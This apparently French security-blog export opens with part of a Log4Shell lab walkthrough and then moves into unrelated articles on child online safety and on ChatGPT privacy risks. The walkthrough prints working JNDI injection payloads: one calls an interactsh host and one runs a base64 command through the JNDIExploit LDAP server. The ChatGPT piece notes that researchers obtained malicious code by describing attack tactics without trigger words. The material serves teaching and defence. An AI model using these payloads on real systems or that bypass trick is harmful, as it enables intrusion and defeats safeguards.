Maintenant l'application vulnérable est en place dans l'environnement de test, la prochaine étape est la détection de la vulnérabilité de type **RCE** via une requête vers un domaine contrôlé par l'attaquant.&#x20;

{% tabs %}
{% tab title="RCE" %}
Les attaques par exécution de code à distance (en anglais: Remote Code Execution) permettent à un attaquant d'exécuter à distance un code malveillant sur un ordinateur. L'impact d'une vulnérabilité RCE peut aller de l'exécution d'un logiciel malveillant à la prise de contrôle totale d'une machine compromise par un attaquant.

Définition: [**CHECKPOINT**](https://www.checkpoint.com/cyber-hub/cyber-security/what-is-remote-code-execution-rce/#:~:text=Remote%20code%20execution%20\(RCE\)%20attacks,control%20over%20a%20compromised%20machine.)
{% endtab %}
{% endtabs %}

### Reconnaissance

Avec l'application exécutée sur ***localhost:8080***, nous pouvons détecter que l'application est vulnérable à Log4Shell en soumettant une interface Java Naming and Directory (JNDI) comme valeur pour l'en-tête X-Api-Version qui déclenche une requête vers le domaine contrôlé par l'attaquant.

Visitez [**interactsh** ](https://app.interactsh.com/#/)et copiez le nom d'hôte généré :

![](/files/4EcUP2DdbqgzL6AI5MZD)

Pour la détection de l'interaction externe, il faut effectuer la requête cURL suivante sans oubliez de remplacer le nom d'hôte interactsh par celui généré pour votre instance:

{% hint style="success" %} <mark style="color:green;">**curl**</mark> 127.0.0.1:8080 <mark style="color:purple;">**-H**</mark> 'X-Api-Version: $<mark style="color:blue;">**{**</mark>jndi:ldap\://c8kz9wf2vtc0000g4ktggrj9w6ryyyyyb.interact.sh/a<mark style="color:blue;">**}**</mark>'
{% endhint %}

![](/files/v89K8M9ZGFXxtSoafMiR)

{% tabs %}
{% tab title="cURL" %}
**cURL** est utilisé dans les lignes de commande ou les scripts pour transférer des données. curl est également utilisé dans les voitures, les téléviseurs, les routeurs, les imprimantes, les équipements audio, les téléphones mobiles, les tablettes, les décodeurs, les lecteurs multimédias et constitue le moteur de transfert Internet de milliers d'applications logicielles dans plus de dix milliards d'installations.

Définition: [**cURL.se**](https://curl.se/)
{% endtab %}
{% endtabs %}

Après avoir envoyé la requête, la recherche de domaine apparaît sur interactsh :

![](/files/VPCmAMrhaWT96qmYGQcx)

Dans les journaux de l'application la tentative de requête API est aussi apparu:

![](/files/uE7azpxAfqGRCq9iIFm2)

Il est temps d'attaquer l'application ! :smile:

![](/files/VWxWMGlmfWjrXORdDEzv)

### Exploitation

Pour exécuter les commandes, il faut faire tourner un serveur LDAP avec les capacités d'exploiter les attaques par injection JNDI. Suivre les étapes pour télécharger le serveur LDAP malveillant:

* Télécharger le zip JNDIExploit via le lien du github de [**christophetd**](https://github.com/christophetd/log4shell-vulnerable-app/blob/main/README.md)

![](/files/w4OiPevnzX5Z2tJCStJx)

-> *Ou via le github suivant de black9 via la commande suivante*:

{% hint style="success" %} <mark style="color:green;">**git**</mark> clone <https://github.com/black9/Log4shell_JNDIExploit>
{% endhint %}

* Dézipper/Décompresser le fichier:

{% hint style="success" %} <mark style="color:green;">**unzip**</mark> JNDIExploit.v1.2.zip
{% endhint %}

![](/files/FSFJiNhkyhasOFoTB5RJ)

Une fois l'archive ZIP décompressée, le menu d'aide du programme peut être consulté via la commande suivante:

{% hint style="success" %} <mark style="color:green;">**java**</mark>**&#x20;**<mark style="color:purple;">**-jar**</mark> JNDIExploit-1.2-SNAPSHOT.jar <mark style="color:purple;">**-h**</mark>
{% endhint %}

![](/files/R9Wxr4NsN4d0eGcjPTPg)

Pour démarrer le serveur LDAP malveillant sur ***localhost:1389***, il faut exécuter la commande:

{% hint style="success" %} <mark style="color:green;">**java**</mark>**&#x20;**<mark style="color:purple;">**-jar**</mark> JNDIExploit-1.2-SNAPSHOT.jar <mark style="color:purple;">**-i**</mark> 127.0.0.1 <mark style="color:purple;">**-p**</mark> 9001
{% endhint %}

![](/files/rOnMaXPtgi960JAMmFHp)

Pour obtenir le reverse shell, une commande echo en base64 va être codée pour écrire des données dans un fichier du dossier /tmp:

{% hint style="success" %} <mark style="color:green;">**echo**</mark>**&#x20;**<mark style="color:purple;">**-n**</mark> 'echo "PWNED par BE HACKTIVE" > /tmp/log4shell.txt' <mark style="color:blue;">**|**</mark> base64 <mark style="color:purple;">**-w**</mark> 0
{% endhint %}

![](/files/EyfI913ehEIr2tfCSCkN)

Pour finir, exécuter la demande via la commande cURL à l'application vulnérable:&#x20;

{% hint style="success" %} <mark style="color:green;">**curl**</mark> 127.0.0.1:8080 <mark style="color:purple;">**-H**</mark> 'X-Api-Version: $<mark style="color:blue;">**{**</mark>jndi:ldap\://127.0.0.1:1389/Basic/Command/Base64/ZWNobyAiQkUgSEFDS1RJVkUiID4gL3RtcC9sb2c0c2hlbGwudHh0<mark style="color:blue;">**}**</mark>'
{% endhint %}

![](/files/1P1p4wkpR114MOvuBLEk)

Afin de vérifier que la commande a été exécutée:

{% hint style="success" %} <mark style="color:green;">**sudo docker**</mark> exec <mark style="color:purple;">**-it**</mark> log4shell-app sh

ls -l /tmp
{% endhint %}

![](/files/3czPMnvdfiAuFwJzR41g)

Nous avons réussi ! :tada:

![](/files/3Ft7zY5mMQRy7CD31TGA)

Le dernier chapitre abordera certains points importants à suivre pour se protéger un maximum des vulnérabilités liées à Log4j.

## VICI

### Identification

Les deux premières questions qu'une organisation devraient se poser sont:

* *Est-ce Log4j existe au sein de mes applications?*
* *Où est implémenté Log4j?*

Plus précisément, elle doit se concentrer sur les applications externes susceptibles d'utiliser Log4j. Il s'agit d'une tâche non triviale étant donné qu'il s'agit d'une bibliothèque, plutôt que d'une application installée, et qu'elle peut être intégrée avec des fournisseurs et des outils tiers.

Pour les organisations qui disposent d'inventaires de ressources solides, ceux-ci devraient être utilisés pour identifier où Java, la JVM (Java Virtual Machine) et les bibliothèques Log4j existent dans leur inventaire.

Il existe actuellement plusieurs ressources qui documentent les applications et les fournisseurs vulnérables connus. C'est un excellent point de départ. Prendre le temps d'examiner ces listes et de déterminer si le logiciel est présent dans le domaine de l'organisation. Si c'est le cas, s'assurer que les derniers correctifs soient appliqués.

* [**Bases de données affectées par Log4j**](< https://github.com/cisagov/Log4j-affected-db>)
* [**Logiciels associés à Log4j**](https://github.com/NCSC-NL/log4shell/blob/main/software/README.md#software-overview)
* [**Avis de sécurité sur Log4shell**](https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592)

Une autre méthode d'identification consisterait à effectuer des scans de vulnérabilité internes/externes, dont beaucoup fournissent désormais des signatures ou des plugins pour identifier les instances Log4j vulnérables.

### Mise à jour

La mesure de protection la plus complète consiste à mettre à jour et à appliquer des correctifs aux bibliothèques Log4j vulnérables découvertes, mais il est évident que cela n'est pas possible dans tous les cas.&#x20;

À l'heure où nous écrivons ces lignes, la version 2.16.0 est la plus récente, et de plus amples informations concernant les corrections des dernières vulnérabilités de Log4j sont disponibles à l'adresse suivante :

* [**Apache Log4j Security Vulnerabilities**](https://logging.apache.org/log4j/2.x/security.html)

Le 14 décembre 2021, une deuxième CVE (CVE-2021-45046) a été découverte dans la bibliothèque Log4j, rendant la version 2.15.0 inefficace dans certaines configurations par défaut. Pour résoudre les deux CVE-2021-44228 et CVE-2021-45046, il est recommandé de mettre à jour la version de Log4j à 2.16.0 au moins.&#x20;

* CVE-2021-44228 (score CVSS : 10.0): Une vulnérabilité RCE affectant les versions de Log4j de 2.0-beta9 à 2.14.1 (Corrigé dans la version 2.15.0)&#x20;
* CVE-2021-45046 (score CVSS : 9.0) - Une fuite d'information et une vulnérabilité RCE affectant les versions de Log4j de 2.0-beta9 à 2.15.0, à l'exception de 2.12.2 (Corrigé dans la version 2.16.0)&#x20;
* CVE-2021-45105 (score CVSS : 7.5) - Une vulnérabilité de type déni de service affectant les versions de Log4j allant de 2.0-beta9 à 2.16.0 (Corrigé dans la version 2.17.0)

{% hint style="danger" %} <mark style="color:red;">**Il est suggéré de suivre les conseils d'Apache et de mettre à niveau vers la version 2.17.0 de log4j.**</mark>
{% endhint %}

Il est néanmoins pas toujours possible de faire les mises à jours, il existe d'autres possibilités pour remédier aux failles liés à Log4j.

### Suppression de la classe JndiLookup

Cette vulnérabilité est due à la façon dont Log4j utilise JNDI.&#x20;

Une façon de corriger cette vulnérabilité est de désactiver l'utilisation des recherches de messages JNDI, ce que fait Log4j 2.16.0. Cependant, cela peut également être réalisé en retirant la classe JndiLookup entière, qui implémente cette fonctionnalité, d'un paquet Log4j affecté.&#x20;

Les composants Java étant essentiellement des archives ZIP, les administrateurs peuvent exécuter la commande suivante pour modifier et corriger une instance de paquet vulnérable:&#x20;

{% hint style="success" %}
zip -q -d Log4j-core-\*.jar org/apache/logging/Log4j/core/lookup/JndiLookup.class
{% endhint %}

### Alternatives

* Cette attaque nécessite que l'hôte affecté établisse une connexion sortante initiale avec le serveur LDAP malveillant de l'adversaire pour charger la classe Java vulnérable. Le blocage des ports standard pour LDAP, LDAPS et RMI (389, 636, 1099, 1389), bien que non exhaustif car le port peut être aléatoire, peut réduire la surface d'attaque.
* IPS et WAF, bien que non exhaustifs en raison des différentes techniques d'évasion possibles dans cette attaque, doivent être mis en œuvre pour aider à la détection et à la réponse.


# Protéger votre enfant en ligne: Conseils pour le "Safer Internet Day"

<figure><img src="/files/mhjrhFHmy0d52s1aTZsq" alt=""><figcaption></figcaption></figure>

Le "**Safer Internet Day**" ou "Journée pour un Internet plus sûr" est une "célébration" (*entre guillemets, car c'est plus une piqûre de rappel qu'une célébration*) annuelle qui vise à créer un environnement en ligne plus sûr pour les enfants et les jeunes.&#x20;

C'est un rappel crucial pour les parents et les personnes qui prennent soin des enfants afin de jouer un rôle actif pour leur garantir la sécurité en ligne.&#x20;

Avec l'utilisation croissante de la technologie, il est plus important que jamais de protéger nos enfants des dangers potentiels qui l'accompagnent.

## Astuces pour protéger les enfants/jeunes&#x20;

La liste ci-dessous n'est bien sûr pas exhaustive et ne donne que des astuces pour vous accompagner:

### 1. Education et Communication

Personnellement, je trouve que ce point est le plus important car il met en avant l'importance d'éduquer les enfants à l'utilisation d'internet mais aussi de n'avoir aucune gêne à communiquer avec vous dès qu'ils trouvent un problème sur le net.

**Enseignez à votre enfant les dangers d'Internet**, tels que le harcèlement en ligne, le phishing et le partage d'informations personnelles. Assurez-vous qu'ils comprennent l'importance de la vie privée et les conséquences d'une (forte) exposition en ligne.&#x20;

Il est aussi important de maintenir une communication ouverte avec vos enfants sur ce qu'ils font en ligne. **Posez-leur des questions** sur leur activité en ligne et **encouragez-les à vous parler** de tout ce qu'ils voient ou ressentent.&#x20;

Dès que votre enfant commence à accéder à l'internet, parlez-lui de ce qu'il lit, de ce qu'il regarde et des personnes avec lesquelles il communique en ligne - **et poursuivez la conversation à mesure qu'il grandit**.&#x20;

Demandez à votre enfant quels sont les sites qu'il visite ou les applications qu'il utilise, dressez-en la liste et regardez-les ensemble. Discutez avec votre enfant de ce que vous pensez être approprié, et rappelez-lui que cela peut être différent pour d'autres parents et leurs enfants. **Écoutez votre enfant** et mettez-vous d'accord sur ce qui convient à votre famille.

{% hint style="danger" %}
**N'oubliez pas que le moment viendra où ils auront accès à Internet en dehors de la sécurité de la maison et vous voulez qu'ils y soient préparés. Il est essentiel de leur apprendre à connaître leur réputation en ligne et à faire attention à la façon dont ils se comportent, interagissent avec les gens et se représentent dans un tel forum public.&#x20;**<mark style="color:red;">**Ils doivent toujours se rappeler que l'internet n'est pas privé et surtout Internet n'oublie rien.**</mark>
{% endhint %}

<figure><img src="/files/YrUkMslvGPqkUNOTYn6P" alt=""><figcaption></figcaption></figure>

#### S'auto-éduquer

L'éducation de soi est très importante pour un parent. Il faut rester à l'affut des dernières technologies, des derniers réseaux sociaux et comprendre comment être en sécurité en ligne afin de pouvoir le transmettre à vos enfants/jeunes.

Rejoignez les mêmes réseaux et applications que vos enfants et familiarisez-vous avec les paramètres de confidentialité et les mécanismes de signalement/protection. Apprenez ensuite à vos enfants le signalement des messages inappropriés, du blocage d'une personne, de la confidentialité des informations et de la nécessité de parler à une personne de confiance en cas de harcèlement en ligne.

### 2. Montrer l'exemple

En tant que parent, vous avez un rôle important à jouer en ce qui concerne l'utilisation d'internet par vos enfants. En montrant un comportement responsable en ligne, vous pouvez en effet démontrer à vos enfants les bonnes pratiques à adopter.&#x20;

**Limitez votre propre temps d'utilisation des écrans** et soyez toujours **vigilant et respectueux** lorsque vous êtes en ligne. Cela montre à vos enfants comment utiliser l'internet de manière responsable. Gardez à l'esprit que **le but n'est pas de faire peur à vos enfant**s, mais de leur donner les compétences nécessaires pour tirer le meilleur parti de l'internet tout en évitant ses dangers.

<figure><img src="/files/ujVtryRhBK9c6IDShhtO" alt=""><figcaption></figcaption></figure>

### 3. Avoir un œil sur les écrans et leurs réseaux sociaux

En plaçant l'ordinateur/tablette/smartphone dans un **endroit commun de la maison**, comme le salon, il vous sera plus facile de surveiller l'activité en ligne de vos plus petits enfants et de vous assurer qu'il ne fait rien de dangereux.

Pour les enfants plus jeunes, vous pouvez également **vérifier l'historique de leur navigateur** après qu'ils aient été en ligne pour voir les sites Web qu'ils ont visités. Lorsqu'ils grandissent et apprennent à effacer leur historique, **la communication sur l'utilisation d'internet devient encore plus importante**.

Lorsqu'ils sont plus grands, il pourrait aussi être judicieux de **mettre en place des règles** (d'un **accord commun** entre le jeune et les parents) sur l'utilisation des appareils dans la chambre.

**Vérifiez les réseaux sociaux de votre enfant** et assurez-vous qu'il ne soit pas victime d'intimidation, exposé à des contenus inappropriés ou qu'il n'adopte pas un comportement qui pourrait nuire à sa réputation.

**Votre enfant doit être conscient du risque que ses informations ou ses images personnelles soient rendues publiques une fois qu'il les a mis en ligne.** Même s'il ne comprendra pas totalement les conséquences de la divulgation d'informations personnelles en ligne, vous devez lui apprendre à être prudent et réfléchi quant à ce qu'il publie et partage.&#x20;

Encouragez vos enfants à se demander, avant de publier quoi que ce soit, s'ils donneraient ces informations: nom, numéro de téléphone, adresse personnelle, courriel, nom de l'école ou cette photo à un étranger. **Si la réponse est non, ne la publiez pas**.&#x20;

Chaque photo et chaque détail personnel publié et partagé sur les réseaux sociaux et sur Internet contribue à l'**empreinte numérique** d'une personne.

{% hint style="info" %}
Empreinte numérique:

Une empreinte numérique, aussi appelée ombre numérique ou empreinte électronique, désigne les données que vous laissez derrière vous quand vous utilisez Internet. Ces données comprennent les sites Web visités, les emails que vous envoyez et les informations que vous soumettez en ligne. Une empreinte numérique peut être utilisée pour suivre les activités en ligne et les appareils d’une personne. Les internautes peuvent créer leur empreinte numérique activement ou passivement.

Source: [**KASPERSKY**](https://www.kaspersky.fr/resource-center/definitions/what-is-a-digital-footprint)
{% endhint %}

<mark style="color:red;">**Le grand risque est qu'une fois que l'information est partagée publiquement, elle peut être utilisée d'une manière à laquelle vous ne vous attendez pas et que vous ne pouvez pas contrôler.**</mark>&#x20;

Vous devez également partir du principe que tout ce qui est mis en ligne est permanent (il peut parfois être supprimé, mais pas toujours avant que d'autres ne l'aient vu et enregistré). C'est pourquoi les enfants et les jeunes doivent protéger intelligemment leurs images et leurs informations. Il en va de même pour les parents qui mettent régulièrement des photos d'eux et/ou de leurs enfants en ligne.&#x20;

Apprenez à votre enfant à garder le contrôle de son empreinte numérique, en ne partageant ses photos qu'avec des personnes qu'il connaît et en qui il a confiance. Plutôt que de poster à tous leurs amis sur les réseaux sociaux, encouragez-les à être sélectifs et à utiliser les paramètres de confidentialité des plateformes de réseaux qu'ils utilisent.

<figure><img src="/files/HQ0sPH0SJZyfgv7Y2Uw6" alt=""><figcaption></figcaption></figure>

### 4. Connaitre les amis et être leur meilleur ami

Les adultes savent que certaines personnes en ligne ne sont pas ce qu'elles prétendent être, mais les enfants et les jeunes peuvent être terriblement inconscients et naïfs.&#x20;

Assurez-vous de faire partie du cercle d'amis de votre enfant dans ses réseaux sociaux et surveillez ses publications.&#x20;

{% hint style="info" %}
Une fois dans la liste des amis/followers de vos enfants, ne devenez pas un fardeau. Ne publier pas des photos qui pourraient les mettre mal à l'aise avec leurs autres camarades, ne commentez pas leurs publications s'ils vous le demandent.&#x20;

Respectez leur espace et surtout, en tant que parent, devenez le meilleur ami de vos enfants. Cela est important pour faciliter la communication.&#x20;
{% endhint %}

<figure><img src="/files/Qo212smRQc6h8iXLIHEA" alt=""><figcaption></figcaption></figure>

### 5. Contrôle Parental

Le contrôle parental est un logiciel ou une option spécifique à un appareil qui permet aux parents de surveiller l'utilisation de l'internet par leurs enfants. Ils empêchent les enfants d'accéder à des contenus en ligne inappropriés, inadaptés ou illégaux.&#x20;

Ils peuvent être mis en œuvre au sein de votre fournisseur d'accès à Internet, des moteurs de recherche, des sites de streaming vidéo, des logiciels de chat et plus encore.&#x20;

Exemples d'implémentation de contrôle parental :

1. **Filtres Internet** : Un filtre Internet est un logiciel qui restreint l'accès aux sites Web en fonction de critères spécifiés, tels que le contenu inapproprié pour l'âge ou des mots-clés spécifiques.
2. **Filtres de contenu TV** : Certains fournisseurs de télévision par câble et satellite offrent des fonctionnalités de contrôle parental, telles que le blocage de contenu, qui permet aux parents de restreindre l'accès aux chaînes ou aux émissions en fonction de leurs cotes de contenu.
3. **Restrictions de consoles de jeux** : Les consoles de jeux, telles que Xbox et PlayStation, ont souvent des réglages de contrôle parental qui permettent aux parents de restreindre l'accès aux jeux en fonction de leurs cotes d'âge et de restreindre les interactions en ligne avec d'autres joueurs.
4. **Contrôle de dispositifs mobiles** : De nombreux smartphones et tablettes ont des fonctionnalités de contrôle parental qui permettent aux parents de définir des restrictions sur les applications, les téléchargements et l'accès à Internet.

<figure><img src="/files/lHp51IIA7RDQrNoCGNuG" alt=""><figcaption></figcaption></figure>

## Conclusion

Le "Safer Internet Day" est un événement annuel crucial qui rappelle l'importance de protéger les enfants en ligne. Par contre, il ne faut pas attendre cette date pour s'en rendre compte et prendre les bonnes résolutions. C'est un travail quotidien et de toute une vie.

Il est essentiel de fournir une éducation et une communication appropriées, de montrer l'exemple en matière de comportement en ligne, de surveiller les activités en ligne des enfants et de les aider à développer des relations en ligne sûres. En tant que parents, tuteurs ou protecteurs des enfants, nous avons la responsabilité de garantir la sécurité en ligne des enfants et de les préparer à naviguer de manière responsable dans ce monde numérique en évolution. "Protégez les enfants en ligne, construisez un Internet plus sûr pour tous avec le "Safer Internet Day".


# ChatGPT: Révolution ou menace ?

ChatGPT : entre révolution technologique et dilemme de confidentialité. Découvrez le potentiel et les pièges.

<figure><img src="/files/Wz4XFLtCWDjdTLMNz23o" alt=""><figcaption></figcaption></figure>

Depuis le déploiement mondial de ChatGPT par OpenAI, les opinions divergent. Certains estiment qu'il va révolutionner notre mode de vie et de travail, tandis que d'autres expriment leur inquiétude quant à son potentiel de bouleversement, notamment en ce qui concerne la confidentialité des individus et des organisations.

Des incidents ont déjà eu lieu comme des informations sensibles qui ont été exposées, et des employés qui ont dû faire face à des conséquences suite à la saisie de données confidentielles de l'entreprise dans le chatbot. Un exemple:

* Samsung a pris des mesures suite aux révélations selon lesquelles trois de ses employés ont divulgué des données sensibles en utilisant ChatGPT. Les travailleurs étaient autorisés à utiliser le chatbot pour expérimenter la résolution des problèmes dans le code source de l'entreprise. SOURCE: [**TECHMONITOR.AI**](https://techmonitor.ai/technology/cybersecurity/samsung-bans-chatgpt)

Certains pays ont même imposé une interdiction temporaire de son utilisation dans le but de protéger les données.

Posons-nous donc les questions suivantes:

* Que fait exactement ChatGPT avec nos informations et comment pouvons-nous l'utiliser de manière sécurisée ?&#x20;
* Quels sont les bénéfices en terme de cybersécurité?
* Quels sont les risques?&#x20;

L'article suivant essayera de répondre au maximum aux questions importantes autour de ChatGPT.&#x20;

<figure><img src="/files/LSY1Q7OTR84CmKUR8YJ0" alt=""><figcaption></figcaption></figure>

## ChatGPT ?&#x20;

Avant de se lancer dans les risques, les questions-réponses, les bénéfices et tout le reste, savez-vous ce qu'est CHATGPT?&#x20;

* Si oui, lisez quand même la suite.
* Si non, lisez surtout bien la suite.

Et quoi de mieux pour définir ChatGPT que ChatGPT lui même !

<figure><img src="/files/b8BFMuMQUkXiIINSUa4t" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
**ChatGPT**:

**ChatGPT** est un modèle de langage artificiel développé par OpenAI. Basé sur l'architecture GPT (Generative Pretrained Transformer), il est capable de générer du texte de manière autonome, de répondre aux questions, de rédiger des essais, de créer et de déboguer du code, de résoudre des équations mathématiques complexes et même de traduire entre différentes langues.

Il a été "entraîné" sur une grande quantité de données provenant d'Internet, y compris des livres, Wikipedia, des articles et d'autres contenus en ligne. Cela lui donne la capacité de comprendre et de générer du texte de manière conversationnelle, bien qu'il ne comprenne pas le sens du texte de la même manière que le ferait un humain.

Il est important de noter, bien que ChatGPT soit capable de produire des réponses impressionnantes, que ses réponses sont basées sur des motifs dans les données sur lesquelles il a été formé, et non sur une compréhension réelle du monde.&#x20;

SOURCE: [**CHATGPT**](https://chat.openai.com/)
{% endhint %}

Cependant, en tant qu'outil de traitement du langage naturel, son fonctionnement est basé sur la probabilité. Il génère des réponses en prédisant le mot suivant dans une phrase, en s'appuyant sur les millions d'exemples sur lesquels il a été formés.&#x20;

## ChatGPT et la cybersécurité

### Nos données sont-elles en sécurité?

ChatGPT conserve les demandes/prompts des utilisateurs ainsi que ses réponses pour continuellement affiner ses algorithmes.&#x20;

Même après la suppression de vos interactions, le bot conserve la capacité d'utiliser ces données pour améliorer ses capacités d'IA. **Cette situation pourrait potentiellement être risquée si les utilisateurs saisissent des données personnelles ou organisationnelles sensibles qui pourraient être attrayantes pour des entités malveillantes en cas de violation de données.**

De plus, il archive également d'autres détails personnels lorsqu'il est en fonctionnement, tels que la localisation géographique approximative de l'utilisateur, l'adresse IP, les informations de paiement et les spécifications de l'appareil (bien que ce type de collecte de données soit courant pour la plupart des sites Web à des fins analytiques, et donc, pas exclusif à ChatGPT).

Les techniques de collecte de données déployées par OpenAI ont suscité l'inquiétude chez certains chercheurs, étant donné que les données extraites pourraient englober du matériel protégé par des droits d'auteur.&#x20;

### Les utilisateurs malveillants

Il semble que ChatGPT soit de plus en plus exploité à des fins malveillantes. Ses compétences en matière d'écriture de code peuvent être utilisées pour créer des logiciels malveillants, développer des sites web obscurs et exécuter des cyber-attaques.

Plusieurs cas d'écriture de codes malveillants, de mails de phishings et autres techniques de cyberattaques ont été rapporté par des utilisateurs. Comme par exemple l'orchestration d'attaques d'hameçonnage très raffinées. En améliorant le langage utilisé, ChatGPT supprime les signes révélateurs d'une orthographe et d'une grammaire médiocres souvent associés aux tentatives d'hameçonnage. En outre, il a été utilisé pour mieux comprendre la psychologie des destinataires ciblés, dans le but d'induire un stress et d'accroître ainsi l'efficacité des attaques de phishing.

En mars 2023, plus d'un millier d'experts en IA, dont les cofondateurs de l'OpenAI Elon Musk et Sam Altman, ont plaidé en faveur d'un arrêt immédiat de la production des principaux outils d'IA générative pendant au moins six mois. Cette pause doit permettre aux chercheurs de comprendre les risques associés à ces outils et d'élaborer des stratégies d'atténuation.

<figure><img src="/files/FW1X716c9HwfQ4ug50DV" alt=""><figcaption><p>SOURCE: <a href="https://twitter.com/elonmusk/status/1599128577068650498?s=20"><strong>TWITTER</strong> </a></p></figcaption></figure>

<figure><img src="/files/bJVA3IAGSeIn0g35hHRB" alt=""><figcaption><p>SOURCE: <a href="https://twitter.com/sama/status/1599134747761946624?s=20"><strong>TWITTER</strong></a></p></figcaption></figure>

## Déjà des failles connues?&#x20;

Quelles violations de données ont eu lieu jusqu'à présent ? OpenAI a confirmé qu'un bogue dans le code source du chatbot a pu provoquer une fuite de données en mars 2023, permettant à certains utilisateurs de voir des parties de l'historique de chat d'un autre utilisateur actif. Il est également possible que des informations relatives au paiement de 1,2 % des abonnés de ChatGPT Plus qui étaient actifs pendant une période donnée aient été mises à disposition.

OpenAI a publié une déclaration dans laquelle elle estime que le nombre d'utilisateurs dont les données ont été révélées est "extrêmement faible", car il aurait fallu qu'ils ouvrent un courriel d'abonnement ou qu'ils cliquent sur certaines fonctions dans une séquence spécifique au cours d'une période donnée pour être affectés. Néanmoins, ChatGPT a été mis hors ligne pendant plusieurs heures, le temps que le bug soit corrigé.

Avant cela, Samsung a connu trois incidents distincts au cours desquels des informations confidentielles de l'entreprise ont été introduites dans le chatbot (le code source de Samsung, la transcription d'une réunion de l'entreprise et une séquence de test pour identifier les puces défectueuses), ce qui a donné lieu à des enquêtes disciplinaires.

Les données n'ont pas été divulguées pour autant que nous le sachions, mais comme mentionné ci-dessus, tout ce qui est entré dans ChatGPT est stocké pour entraîner son algorithme, de sorte que les informations confidentielles entrées par les membres du personnel de Samsung sont, en théorie, maintenant disponibles pour toute personne utilisant la plateforme.

#### Et si on demandait directement à CHATGPT

<figure><img src="/files/7VSEodUDa68CbSQap2b2" alt=""><figcaption></figcaption></figure>

OpenAI déclare effectuer des tests annuels pour identifier les faiblesses de sécurité et empêcher qu'elles ne soient exploitées par des acteurs malveillants. Elle gère également un "[programme de récompense des bugs](https://openai.com/blog/bug-bounty-program)", invitant les chercheurs et les pirates éthiques à tester la sécurité du système pour détecter les vulnérabilités en échange d'une récompense en espèces.&#x20;

## Protection

Comme pour toutes les applications numériques, ChatGPT déclare:

**" Si vous avez des inquiétudes concernant la confidentialité ou la sécurité de vos interactions avec ChatGPT, il est conseillé d'éviter de partager toute information personnelle identifiable ou sensible. Bien que l'OpenAI vise à fournir un environnement sécurisé, il est essentiel de faire preuve de prudence lorsque l'on interagit avec des systèmes d'IA ou toute plateforme en ligne**".

Un autre conseil général est de créer un mot de passe fort et unique et de fermer l'application après l'avoir utilisée, en particulier sur des appareils partagés. Il est également possible de refuser que ChatGPT stocke des données en remplissant un formulaire en ligne:

* [**Formulaire: User Content Opt Out Request**](https://docs.google.com/forms/d/1t2y-arKhcjlKc1I5ohl9Gb16t6Sq-iaybVFEbLFFjaI/viewform?ts=63cec7c0\&edit_requested=true)

En avril 2023, OpenAI a introduit une nouvelle fonctionnalité permettant aux utilisateurs de désactiver l'historique des conversations. Les conversations entamées après avoir activé cette fonction ne sont pas stockées pour entraîner l'algorithme et n'apparaissent pas dans la barre latérale de l'historique, mais elles sont conservées pendant 30 jours avant d'être définitivement supprimées.

## Avantages

**SOURCE**: [**TECHTARGET**](https://www.techtarget.com/)

-> Les images ci-dessous sont générées par [**MidJourney**](https://www.midjourney.com/home/?callbackUrl=%2Fapp%2F):

* *Midjourney est un laboratoire de recherche indépendant qui produit un programme d'intelligence artificielle sous le même nom et qui permet de créer des images à partir de descriptions textuelles, suivant un fonctionnement similaire à celui de DALL-E d'OpenAI.*

### Automatisation de la cyberdéfense&#x20;

<figure><img src="/files/IGgK0v39byXCFCSCXTBj" alt=""><figcaption></figcaption></figure>

ChatGPT pourrait aider les analystes des centres d'opérations de sécurité (SOC) surchargés de travail en analysant automatiquement les incidents de cybersécurité et en faisant des recommandations stratégiques pour aider à informer les mesures de défense immédiates et à long terme.

Par exemple, plutôt que d'analyser le risque d'un script PowerShell donné à partir de zéro, un analyste SOC pourrait s'appuyer sur l'évaluation et les recommandations de ChatGPT. Les équipes SecOps peuvent également poser à OpenAI des questions plus générales, telles que la manière d'empêcher l'exécution de scripts PowerShell dangereux ou le chargement de fichiers à partir de sources non fiables, afin d'améliorer les mesures de sécurité globales de leur organisation.

### Simulation de l'adversaire&#x20;

<figure><img src="/files/cfeSfR4wKXSgN3fPDmfR" alt=""><figcaption></figcaption></figure>

Les paramètres de ChatGPT impliquent qu'il ne répondra pas aux demandes qu'il considère comme suspectes, mais les utilisateurs continuent de découvrir des failles. Par exemple, si l'on demande à ChatGPT d'écrire un code de ransomware, il refusera de le faire. Mais de nombreux chercheurs en cybersécurité ont indiqué qu'en décrivant des tactiques, des techniques et des procédures pertinentes - sans utiliser de mots d'alerte tels que malware ou ransomware - ils peuvent amener le chatbot à produire du code malveillant.

Les créateurs de ChatGPT tenteront probablement de combler ces lacunes au fur et à mesure qu'elles apparaîtront, mais il semble plausible que les attaquants continueront à trouver des solutions de contournement. La bonne nouvelle est que les testeurs de pénétration peuvent également utiliser ces failles pour simuler le comportement réaliste d'un adversaire à travers divers vecteurs d'attaque dans le but d'améliorer les contrôles défensifs.

### Rapports sur la cybersécurité

<figure><img src="/files/v0AFWLmUzSzaOCCdKRzQ" alt=""><figcaption></figcaption></figure>

Les rapports détaillés sur les incidents de cybersécurité jouent un rôle essentiel en aidant les principales parties prenantes - c'est-à-dire les équipes SecOps, les responsables de la sécurité, les dirigeants d'entreprise, les auditeurs, les membres du conseil d'administration et les secteurs d'activité - à comprendre et à améliorer la posture de sécurité d'une organisation.

Cependant, la production de rapports d'incidents est un travail long et fastidieux. Les praticiens de la cybersécurité pourraient utiliser ChatGPT pour rédiger des rapports en fournissant à l'application des détails tels que les suivants :

* La cible de la compromission ou de l'attaque.&#x20;
* Les scripts ou shells utilisés par les attaquants.&#x20;
* Les données pertinentes de l'environnement informatique.&#x20;
* En déchargeant ChatGPT de certaines tâches d'établissement de rapports sur la cybersécurité, les intervenants en cas d'incident pourraient consacrer plus de temps à d'autres activités essentielles.&#x20;

De cette manière, l'IA générative pourrait contribuer à atténuer les problèmes d'épuisement professionnel et de manque de personnel dans le domaine de la cybersécurité.

### Renseignements sur les menaces&#x20;

<figure><img src="/files/tctfGnhEGtj9W83FATtu" alt=""><figcaption></figcaption></figure>

Les spécialistes de la recherche sur les menaces ont aujourd'hui accès à une quantité sans précédent de renseignements sur la cybersécurité provenant de sources telles que l'infrastructure de leur entreprise, les flux de renseignements sur les menaces externes, les rapports sur les violations de données accessibles au public, le dark web et les médias sociaux. Bien que la connaissance soit un pouvoir, les humains ne peuvent pas analyser et synthétiser de manière cohérente une telle quantité d'informations de manière significative.

L'IA générative, en revanche, pourrait bientôt faire ce qui suit presque instantanément :

* Consommer de vastes volumes de données de renseignements sur les menaces provenant de diverses sources.&#x20;
* Identifier des schémas dans les données.&#x20;
